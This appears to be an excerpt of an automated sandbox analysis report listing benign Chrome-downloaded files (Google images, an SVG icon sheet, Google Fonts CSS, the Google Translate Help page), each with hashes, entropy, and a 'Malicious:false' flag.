                                                                                                                                                                                                                                                            File Type:PNG image data, 512 x 288, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):90109
                                                                                                                                                                                                                                                            Entropy (8bit):7.981989065003746
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:ruFu7+4HH6qkOOLu8HcpIGXhOGpOXGEIsrSlwUbS85URF0me4fuUwpx0SHkv2QHP:i43dkBZGpOXlIsrSlwUbzKHANpuRbHKo
                                                                                                                                                                                                                                                            MD5:F2DE7B8ADD482C76E614BAF7F19C5099
                                                                                                                                                                                                                                                            SHA1:727303C189342F8225F202C50E1CA740D727CBA3
                                                                                                                                                                                                                                                            SHA-256:895F02B69BBCCB694F03D47A76619FD1E557A8AA82711EE77BDE07592F44D1BD
                                                                                                                                                                                                                                                            SHA-512:035764BCDDD88AB8FDD01AD4262145CC1099B204132DD0D475D81D57685B1019959D0C39552D3282D5D00A74E36403BE3D7E5C1B126EB97F2BB4DF364A5CBC28
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/tD_w389S4CFuR3LEnia0XnPrkuW6fWmQ2PBUrWJdmmAr8VNpsiVssfVzWTcZ6tRdKiThCpGubjas3ibI58FTlcUGnD8m_X7L9jgNeo07i12huWjZkqK1
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR....... ......<.Q....sBIT....|.d... .IDATx..K..8.&......qG..Gx%..J<.Ex...;.rw..... E)..s...['SI.M<>. ...._........Yk._..L.....<].'..D ..y>...$g...y....|..*..;D1..y.....F.*..Uj.sj..}..M..o3.m>Kc..z.O..z...3s..E8.`..c.3.J.v.x.wZ...:..wr;.H.b...a...~7^...D......K.^..?jv.M]Yr4u]....G.....Y..$".;iO.........U.._{^k.>...=O.]!.M..~....g..[J.0..}.%..x.....|/em.i.g...e........w./..._....Q.."...@../......6=+...<.?}n.F...=?=..r..#&>.~.^%.W..g...O...q..'b03.}g.>1..NW.M....G.... .N...].......7.L....x|g......&.$..u.......k....HsMU.Pz...&WT.......6.........i.`..*.NH...<B....A.9Ko1..q......*..........@.Z..%.<..........G.UEp...d.x.R.^Cx.z&....z.(<.>..PS?U...=..fn(Hf...#...k...k..~G.\......Q...1.S..1.I..O#j.....f.?f.>.ax.z..w....A.....1.<.^.....J.q.i?]C.....r.V..X...8.Qg`..N..zw....#.z.....1........D....?p..P.w......S.Q.?.!.....yN..I.8...N..+v.u.G.).f.A...|.L5.J4..v...o...A....(e.dR|.._o<...z..s.Qp......x{...NXI.[_;t....N....4*.I.m....==>~...2
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1280x960, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):160860
                                                                                                                                                                                                                                                            Entropy (8bit):7.9747186136275054
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:czbUg3anuNClCc0wCGJDPk1AsNJ/dwKaXlN/cU2Z/uU0zoMBIfgVtndJny:cvUgKuNG0wbJQVGXm/SBIITnvy
                                                                                                                                                                                                                                                            MD5:61A45740CD8E3DD816BF74A9180A9645
                                                                                                                                                                                                                                                            SHA1:545EF860DF00F4F9989A4369CD60181914AFD0C5
                                                                                                                                                                                                                                                            SHA-256:8C646C7E2282D208E628BF35BF8B1597B0F61E94648CEF907AD3A46053AD2498
                                                                                                                                                                                                                                                            SHA-512:C943AF054F7E09C61D142CA2E54DA684972AECFE1A4C96027F9989FFEBE947A139F76653F404C22F2E78E4430524092ACD5EAD5278842E775C8FAF1FF2B6E3B8
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/LOrhe71Tt-bTc3xdZDG8fwvwhs8qF0ygHRj9DjbcQpP6WWkHFwd8Kca9FbMjZ_y8GVAVlmDhEYlkQxQCVnvCstsYzS_ahoD4SPjUYQo8T3aO3ifLzi8=w1440-l90-sg-rj-c0xffffff
                                                                                                                                                                                                                                                            Preview:......JFIF..........................................................................................................................................................."........................................._..........................!.1."2ABQR..#..3Cabqr.Sc..s........$........D4...%Tt....d........5..................................A.........................".!2.1B.AR#Q.3abrq.$......C........4..............?..5.Z../..1.....hR."V-..hQ......%.\.M:.hK.....BA.&Sb...ZURt..'..s.......=fp..Y.u.....!)..f.BC.k.P...~.3......=$}.q..:.~.@.......nn.xng..Z..AX../.0X.Sb...33...\...(....b..J.#B.J..h.V........n....4,K.Bq.X../BAD,K...jKJ.B.JRZ......%....#Z.{2....;..d2.A...J..aUu..c.v...+.....f.K+..x.^=..m:.jq.,...E..vX3...G.........[......S.Yn..~.d.........4.l...P...`.,.ke?5.G/N.C{+c......r.k._F.d.4..(.V.#..P\..*Fy_dC..f~K..-v.1.."GA6.D(.V}.~.k6.~.R.\..]....Vd......=.|4........d.2u........".#..Yt.7.G1.cC...uT+6..V...o..u5...@p..r..P.1 ....Bjs.1i......T.$.....D..QZ...
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Picasa], baseline, precision 8, 660x330, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):56671
                                                                                                                                                                                                                                                            Entropy (8bit):7.923320488979839
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:eOZtatZjURa/ycGyaaUReYRNAwe291NHoQY:eO+VHGyaBMYUdwgQY
                                                                                                                                                                                                                                                            MD5:B2E82E8740F78C1ACF6B8940A02E5A03
                                                                                                                                                                                                                                                            SHA1:AD0CF2FB33611802CA2955A880A9E27660829CD3
                                                                                                                                                                                                                                                            SHA-256:F631725199C7DC0A21E5654B376E9AD75F5D77EAE7DB0A74E99BC3EF8CDE9F8B
                                                                                                                                                                                                                                                            SHA-512:E00F5A0CFC9EA94043031F05D7AA50AC042C7299C04D5A6D579601DC44B640AD6C74DBE9531B44173FAB1B20B62C1D5A7B7FF64C8A213F428939FC845269F55A
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/gG7E-il42mOcA4BFm8CCSre-bGncM7LG4CEC6qvhoFog6buhLTlixRBjgofIsPFO-hFkn1eDmmP6qlWpNHeO9qv5dVmqbjF6Up6oLV_I=s660
                                                                                                                                                                                                                                                            Preview:......JFIF.............*Exif..II*.......1...............Picasa.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Referen
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Picasa], baseline, precision 8, 512x288, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):68738
                                                                                                                                                                                                                                                            Entropy (8bit):7.948798168119639
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:bSFzl579NKsDuX06xVg8hb6NRgESUXVz3UgyIAEP7W5W0LpGI:bSFzl579NKsC06Zb6DgESEbUBIAd5WI3
                                                                                                                                                                                                                                                            MD5:8500A64528D3572D39BBC171FDB26382
                                                                                                                                                                                                                                                            SHA1:77024C098EF04EAD512628A09B596B10C908CD79
                                                                                                                                                                                                                                                            SHA-256:2DCC5D3048CA5089E0AA09246DE656B9E1B586C2CEEC9645A417DB7F160F8605
                                                                                                                                                                                                                                                            SHA-512:D4D9E6F9C87CA9BCF1C972E2AFD98E3CFC9BCC29C9F63C33C29FECC6C47C3D75D598DD9BCC303E78A11ABEEACF0B771F7A547372824B8071BFCA428FA80F07C5
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/knzdaC9H3UsDyJYIxRR90Ngh5TdE57GkEDMlgpbT7fO_u8Dmh3l3VmWAzxyxtOBM8x3Lw_lxvIO5Ph27fDNB1L9p-EWaog2Ji6b2lw
                                                                                                                                                                                                                                                            Preview:......JFIF.............*Exif..II*.......1...............Picasa.....PICC_PROFILE......@appl....mntrRGB XYZ .........!.#acspAPPL....APPL...........................-appl................................................desc...\...bdscm........cprt.......#wtpt........rXYZ........gXYZ........bXYZ........rTRC........aarg...$... vcgt...D...0ndin...t...>chad.......,mmod.......(vcgp.......8bTRC........gTRC........aabg...$... aagg...$... desc........Display.................................................................................mluc.......&....hrHR........koKR........nbNO........id..........huHU........csCZ........daDK........nlNL........fiFI........itIT........esES........roRO........frCA........ar..........ukUA........heIL........zhTW........viVN........skSK........zhCN........ruRU........enGB........frFR........ms..........hiIN........thTH........caES........enAU........esXL........deDE........enUS........ptBR........plPL........elGR........svSE........trTR........ptPT........jaJP......
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):14116
                                                                                                                                                                                                                                                            Entropy (8bit):4.65552037622446
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:xkV/Jtv95PDg1g0Sx3Leu4UX644Y48TeJKCR3jIL3n4Z:xkV/JtvPca0Sxbeu4UX644Y46KKCR3Au
                                                                                                                                                                                                                                                            MD5:AD4439B83B65F1CA4CD6C81178DBC6A5
                                                                                                                                                                                                                                                            SHA1:F505AF59D6CD81DA9C153622F7F09ABE812073B6
                                                                                                                                                                                                                                                            SHA-256:254A7C313076C3CBD2A21E78C9C9762DBEDFF5F3D21CAC6090A8C4F67334E942
                                                                                                                                                                                                                                                            SHA-512:690AC84ED5CC5C3BB34CA3207401E601CD065CE8725AC5A50219962108F15BE64CAA09C8D2D07ECD159B2A32330F27A6061FA18027379D574200B9813AC68D2C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://about.google/assets-main/img/glue-icons.svg
                                                                                                                                                                                                                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg">. <defs>. <svg id="chevron-left" viewBox="0 0 24 24"><path d="M16.41 5.41L15 4l-8 8 8 8 1.41-1.41L9.83 12"></path></svg>. <svg id="chevron-right" viewBox="0 0 24 24"><path d="M7.59 18.59L9 20l8-8-8-8-1.41 1.41L14.17 12"></path></svg>. <svg id="expand-less" viewBox="0 0 24 24"><path d="M18.59 16.41L20 15l-8-8-8 8 1.41 1.41L12 9.83"></path></svg>. <svg id="expand-more" viewBox="0 0 24 24"><path d="M5.41 7.59L4 9l8 8 8-8-1.41-1.41L12 14.17"></path></svg>. <svg id="arrow-back" viewBox="0 0 24 24"><path d="M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.41L7.83 13H20v-2z"></path></svg>. <svg id="arrow-forward" viewBox="0 0 24 24"><path d="M12 4l-1.41 1.41L16.17 11H4v2h12.17l-5.58 5.59L12 20l8-8-8-8z"></path></svg>. <svg id="arrow-upward" viewBox="0 0 24 24"><path d="M4 12l1.41 1.41L11 7.83V20h2V7.83l5.58 5.59L20 12l-8-8-8 8z"></path></svg>. <svg id="arrow-downward" viewBox="0 0 24 24"><path d="M20 12l-1.41-1.41L13 16.17V4h-2v12.17l
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):2787
                                                                                                                                                                                                                                                            Entropy (8bit):5.570988829563644
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:ZOxMMB9kOJOxMMB9YivFZ8OxMMB9hOxMMB9eOxMMB9odUOxMMB9ZvOxMMB99toQg:ZOxMMBtJOxMMBfvFZ8OxMMBjOxMMBoOq
                                                                                                                                                                                                                                                            MD5:1EFD88F39E1B11D2F6506F4E7C853D60
                                                                                                                                                                                                                                                            SHA1:35ADDC2C29544E49BCA30C49CFF776D7CD6805F5
                                                                                                                                                                                                                                                            SHA-256:3262C2BD70D868ED379B89EB25E964BF826721F17189A5170C352D20A7563F94
                                                                                                                                                                                                                                                            SHA-512:18609127E68B33614D9FAA5E3CCB53BC2D5F8F89A1EC3DC6451D6DE90787B1F39CA0F721AE1D9DC85A850681F38E3801A38A998919B95EDDF593CDE132CA694A
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.googleapis.com/css?family=Open+Sans:600
                                                                                                                                                                                                                                                            Preview:/* cyrillic-ext */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 600;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v34/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4taVIGxA.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 600;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v34/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4kaVIGxA.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 600;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v34/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4saVIGxA.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-fa
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 2096 x 1182, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1397912
                                                                                                                                                                                                                                                            Entropy (8bit):7.999502782649447
                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                            SSDEEP:24576:klmmw+GdWIw6bsSpYx6/7IP44xYalp2jl6SPZBUdQIY+JYrQ+4v7n+xy++lkvFDR:klmmw1nvt2xl7xYy2jlbBSQIYjQ+4vDS
                                                                                                                                                                                                                                                            MD5:24937F8EC9D3CDA2FE594281D24032A8
                                                                                                                                                                                                                                                            SHA1:EE261D7971C8BE75A25886830597D53441E28328
                                                                                                                                                                                                                                                            SHA-256:D045CDD72AB608D8FD1502364774695AEF75DE9857BF9B329E81CEA487005449
                                                                                                                                                                                                                                                            SHA-512:3FF049F3EF1FB619CD16E902AD5A3E57B67C3764FEE3DC8BDF20DDD311C47D6B45D29B5DDB4A6D946F41416CE0F7AF1B3AF83B5C01DFDAC6748261E125EFC40A
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR...0.................tEXtSoftware.Adobe ImageReadyq.e<...xiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.da4a7e5ef, 2022/11/22-13:50:07 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:057644e4-7c43-4d7f-9ac1-34b9316abd3e" xmpMM:DocumentID="xmp.did:63646504B21311ED8819D3BA196521D9" xmpMM:InstanceID="xmp.iid:63646503B21311ED8819D3BA196521D9" xmp:CreatorTool="Adobe Photoshop 24.1 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0cd20916-8c3c-4aab-a64a-d9ae52654838" stRef:documentID="xmp.did:057644e4-7c43-4d7f-9ac1-34b9316abd3e"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.Ez...P.IDATx....$..$.O...B2.I:..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1, software=Picasa], baseline, precision 8, 512x288, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):25658
                                                                                                                                                                                                                                                            Entropy (8bit):7.882789712129872
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:eYyzOyTaYZ9e8LPX3vqyKmQ+u2VFgSyPAz1b5t:eWyTa+9dLX3v/KmLYSyPAzZ7
                                                                                                                                                                                                                                                            MD5:A2BDE59FD465EA893A93B907CC0C9F3E
                                                                                                                                                                                                                                                            SHA1:1601CE90CDCE508325A31CE75DDEC4B12C1B841E
                                                                                                                                                                                                                                                            SHA-256:CC6C3D7DFCACF1F11407F2EE0106FE9964577091BEEFDC3AFF7636BD58D2B784
                                                                                                                                                                                                                                                            SHA-512:E2EEAADA02F75FE1D0B1C132B2A70D0F1CAAEB51B042FB3E77B8395D839FFE3AEF970C8020B1B9A6A4535A72F066348C05595289100C9122D348826E50AADC25
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:......JFIF.............*Exif..II*.......1...............Picasa.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Referen
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x288, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):26090
                                                                                                                                                                                                                                                            Entropy (8bit):7.963459634654199
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:Mpv/83sXBsXeKwinS3YfdbA0zg1uTN6hvAlG8SQ944MD:Ov/83sXGuKwoJdbp9N6hvAlpSsq
                                                                                                                                                                                                                                                            MD5:3944CBEA92294B18CF2A5F7A44D9D8D8
                                                                                                                                                                                                                                                            SHA1:99785F157EA699D6398D00E21B55C88A12B5D542
                                                                                                                                                                                                                                                            SHA-256:CB87EACB152A9863DAD1DDE9A2A0D1F67A385D4245C4DFA034F8B199F5B2B8A4
                                                                                                                                                                                                                                                            SHA-512:37798E481B5635AB7AACCD149291F458C1AEF10E8B47DD4F2E3EF492AE5E6764B3AC87E1ACDE37882C558E19138945BC65718D09C0E53B90D83DAC8D0A22AFE1
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:......JFIF...................................................................................................................................................... ..............................................E......................!..1.AQ..."aq.........2..#BR.b.$3r%.....4CDS.................................8........................!1A.Q.."aq....2BR.....#r..3...............?..`......... .."P+...p.rHB`.j(vH.1.m$.......@.@.......<t.D.......(@.@.sO....'A....'p..(....;$....&!.@"...TP..C%.....F./2&.TZt.Zt-....P....!...s.6@... .....;..!bP.4..Je..'......^"L..0.$...E... .......... ...fE......cZ..0.P..iJ.`[(N...&g.BP]....n..R.4(.".....L.....i.[.+4...*/r"...V.....Bc.[DI..&C.D.....C-@XeE..%..M..H5.6,...D.p..=.-A6...........{..|.|...KJ.V.#.~.h{.*[Ed:....K........s...h.@.@....:_....Q$0Y.X&....{...H...6..{.x.{.! `...(.@......U.... ["F.q.{.~~.1..I..-5...%qD..%!h..@%V..'N.&..M...-J.&SR...|...c|..%....<...T..%l...%F....O?T..C.....w...C.d.@ ....@..;......S6....E:.E..+..h.1-....Da..0
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (56102)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):880597
                                                                                                                                                                                                                                                            Entropy (8bit):5.67591793908929
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24576:9JzT93a5fD3qnqOS5sXBFGOvHb97oi0ob3aPUXDhLTc:9JzT9q573qnqx5sXBF57XDhLTc
                                                                                                                                                                                                                                                            MD5:76D0B717850F9D23B07932257039E90D
                                                                                                                                                                                                                                                            SHA1:D4986FDC8EB3811EF58B1BB93F27B8D98C831A44
                                                                                                                                                                                                                                                            SHA-256:2C7C91A2BDF4ED03B8051113CB11E21F64942ED42910EB0C6EEDFAA0C30CEB44
                                                                                                                                                                                                                                                            SHA-512:D3405278EC881C8F8B2C9F4322179C8602322A4F83B8FDD7EA9EA39775DBB88887C3D6DAB00560F01B16BDC24D8E07255C45B7192A209625BBA35D06FF10F95E
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://support.google.com/translate/?hl=en
                                                                                                                                                                                                                                                            Preview:<!doctype html><html class="hcfe" data-page-type="HOMEPAGE" lang="en"><head><title>Google Translate Help</title><meta content="email=no" name="format-detection"><meta content="follow,index" name="robots"><meta content="IE=edge,chrome=1" http-equiv="X-UA-Compatible"><meta content="Official Google Translate Help Center where you can find tips and tutorials on using Google Translate and other answers to frequently asked questions." name="description"><link href="https://support.google.com/translate/?hl=en" rel="canonical"><meta content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=3,user-scalable=yes" name="viewport"><style>@font-face{font-family:'Roboto';font-style:normal;font-weight:400;src:url(https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu72xKOzY.woff2)format('woff2');unicode-range:U+0460-052F,U+1C80-1C88,U+20B4,U+2DE0-2DFF,U+A640-A69F,U+FE2E-FE2F;}@font-face{font-family:'Roboto';font-style:normal;font-weight:400;src:url(https://fonts.gstatic.com/s/roboto/v
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 500x333, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):87337
                                                                                                                                                                                                                                                            Entropy (8bit):7.974560988679148
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:bMcRM8COURXOdWFQT1YFdBUWvpLYh/j6/odj2HRF+nI/FU/YQa8ZdpaOatSvZFF:bMcbdIjWaFHcLJSPf/+d/a0FF
                                                                                                                                                                                                                                                            MD5:12ED06671CB16B8B2C933AB279C33CAA
                                                                                                                                                                                                                                                            SHA1:43919A783C8C06BB695A4CA207D9F40C5D542F83
                                                                                                                                                                                                                                                            SHA-256:8493125A9E8196E2C38F39169E39BD0CCA954814507660F979C1BC002044F9FF
                                                                                                                                                                                                                                                            SHA-512:2DD5A942AEA77BC29BF6DAACC8571476E4C61E8FFCEBCE48B03C651F761F16AC3137E2516419366C7C703FA1523B9D619C6EF79E36C6D19BF23D42BEA8DF4226
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:......JFIF......................................................................................................................................................M....".........................................J.......................!..."1.A.#2Q.Baq.3R.....$b..C...Sr.....4.%DTcs....................................B.......................!.1AQ.a.."q.....2...B.#Rbr....$3.....6D4............?...z...;.GX.I..1...VH..1..6........\H.=I.-..(.f.W..p.o&*UC.2.l....!.uLB.N......= ..0.J...l*..[.<I$.m.!.=2.S..`..k.`1aB...`..$.4...Ma.......^....._..D..J.$..W..RD..4r...p...%.9.R..:.0.......P.J..$g..QO..X.../,.B3...LA+..LH......@...^..>l....c.YU....O$.*4...{.h..h.<\e.....|.}.v.$...;~V4.#d....V.yS$K!]...C...h.@.L.........c4....&1.@...F... ....4.5<2.....Bg..O...8.X....<. c.....L..RO.g.I..3.?, B..%....p.........q.1..V.P1m.fd.Oh..[.u....O...q-....I.%.Pl..S.....|..l..i546..............i....d.b.`..!gb2`..;V.x..*...wT..B+.)...0..J hO......A....d..'...UN..4.e~_.X.S..S.!.t.R@..l.f..`...
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (511)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):6122
                                                                                                                                                                                                                                                            Entropy (8bit):5.4547765170030065
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:UEdhFkZUeaSGfRBF2jtTBkhAGW3wl6hQxHLBb+pKP6uMDWjqyrtiobnd3ATMeL/n:TdhFnQutCs6hQx9+pKCcmyrjKMeLP
                                                                                                                                                                                                                                                            MD5:FB87C3D2BC58C37C30122DE430A0EA70
                                                                                                                                                                                                                                                            SHA1:66FF0F0D2703FED3CB9D23380329442C598E14D1
                                                                                                                                                                                                                                                            SHA-256:4A2645231E15E57BE5A201AD945730D7CC15CF257AAD77192B7ECEFC50C18831
                                                                                                                                                                                                                                                            SHA-512:7B9F8AE2ED3844FB678F41CEDD8F5122DF804736DFED570F3105EC657C7BD8161D947A5211358E6C0CA7F2750B6DEC85FA728B1C47400D1E4CBBD9E760907BA0
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
